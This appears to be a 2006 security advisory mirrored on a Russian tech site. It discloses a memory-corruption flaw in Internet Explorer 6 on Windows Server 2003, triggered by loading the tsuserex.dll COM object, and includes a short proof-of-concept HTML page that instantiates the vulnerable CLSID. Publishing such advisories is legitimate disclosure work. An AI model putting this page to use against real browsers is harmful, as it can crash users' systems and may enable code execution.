The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[XSec-06-06]: Windows 2003 (tsuserex.dll) COM Object Instantiation


<< Previous INDEX Search src / Print Next >>
Date: Fri, 18 Aug 2006 01:36:51 +0800
From: nop <nop@xsec.org.>
To: [email protected]
Subject: [XSec-06-06]: Windows 2003 (tsuserex.dll) COM Object Instantiation
 Vulnerability
Content-Type: text/plain; charset=GB2312
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru

Advisory ID:
XSec-06-06

Advisory Name:
Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability

Release Date:
08/18/2006

Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN

Affected version:
Windows Server 2003 + Internet Explorer 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
A vulnerability has been found in Internet Explorer 6.0 on \
Microsoft Windows 2003. When Internet Explorer tries to \
instantiate the tsuserex.dll (Terminal Services) COM object \
as an ActiveX control, it may corrupt system memory in such \
a way that an attacker may DoS and possibly could execute \
arbitrary code.

Exploit:
=============== tsuserex.dll.htm start ================

<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
Vulnerability
// tested on Windows 2003 EE SP1 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll

--!>

<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>

=============== tsuserex.dll.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14

About XSec:
We are redhat.



<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру